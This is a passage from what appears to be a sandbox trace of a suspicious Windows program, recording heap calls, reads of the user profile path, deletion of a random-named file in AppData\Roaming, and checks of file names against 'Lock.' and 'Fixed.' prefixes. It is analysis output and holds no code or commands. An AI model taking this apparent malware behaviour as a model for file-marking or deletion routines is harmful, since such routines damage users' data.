returned 0x24b18d8 [0196.645] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x86) returned 0x2420898 [0196.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoWnh3Q5rTDnpXdJ.mp3", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoWnh3Q5rTDnpXdJ.mp3", lpFilePart=0x8bedfc*="CoWnh3Q5rTDnpXdJ.mp3") returned 0x42 [0196.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0196.646] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoWnh3Q5rTDnpXdJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cownh3q5rtdnpxdj.mp3")) returned 0x2020 [0196.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoWnh3Q5rTDnpXdJ.mp3", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedf9e5f0, ftCreationTime.dwHighDateTime=0x1d4d504, ftLastAccessTime.dwLowDateTime=0xe90312a0, ftLastAccessTime.dwHighDateTime=0x1d4c9c5, ftLastWriteTime.dwLowDateTime=0xe90312a0, ftLastWriteTime.dwHighDateTime=0x1d4c9c5, nFileSizeHigh=0x0, nFileSizeLow=0x174f, dwReserved0=0x99c, dwReserved1=0x4, cFileName="CoWnh3Q5rTDnpXdJ.mp3", cAlternateFileName="COWNH3~1.MP3")) returned 0xaa57a0 [0196.647] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoWnh3Q5rTDnpXdJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cownh3q5rtdnpxdj.mp3")) returned 1 [0196.648] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedf9e5f0, ftCreationTime.dwHighDateTime=0x1d4d504, ftLastAccessTime.dwLowDateTime=0xe90312a0, ftLastAccessTime.dwHighDateTime=0x1d4c9c5, ftLastWriteTime.dwLowDateTime=0xe90312a0, ftLastWriteTime.dwHighDateTime=0x1d4c9c5, nFileSizeHigh=0x0, nFileSizeLow=0x174f, dwReserved0=0x99c, dwReserved1=0x4, cFileName="CoWnh3Q5rTDnpXdJ.mp3", cAlternateFileName="COWNH3~1.MP3")) returned 0 [0196.648] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0196.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.648] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0196.649] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0196.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0196.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.652] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0196.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0196.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x86) returned 0x2420898 [0196.655] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoWnh3Q5rTDnpXdJ.mp3", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoWnh3Q5rTDnpXdJ.mp3", lpFilePart=0x8bf658*="CoWnh3Q5rTDnpXdJ.mp3") returned 0x42 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0196.655] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoWnh3Q5rTDnpXdJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cownh3q5rtdnpxdj.mp3")) returned 0xffffffff [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.655] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0196.655] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.655] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0196.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0196.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dunBms1jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="unBms1jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBms1jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bms1jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ms1jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jB_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.657] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dunBms1jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="unBms1jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBms1jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bms1jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ms1jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jB_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.658] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0196.658] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0196.658] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.658] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0196.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.658] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.659] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0196.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.660] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/dunBms1jB_.jpg", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dd9ae10, ftCreationTime.dwHighDateTime=0x1d4ca95, ftLastAccessTime.dwLowDateTime=0xb0f4f2d0, ftLastAccessTime.dwHighDateTime=0x1d4c749, ftLastWriteTime.dwLowDateTime=0xb0f4f2d0, ftLastWriteTime.dwHighDateTime=0x1d4c749, nFileSizeHigh=0x0, nFileSizeLow=0x7315, dwReserved0=0x9080039, dwReserved1=0x12eb4, cFileName="dunBms1jB_.jpg", cAlternateFileName="DUNBMS~1.JPG")) returned 0xaa57a0 [0196.660] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 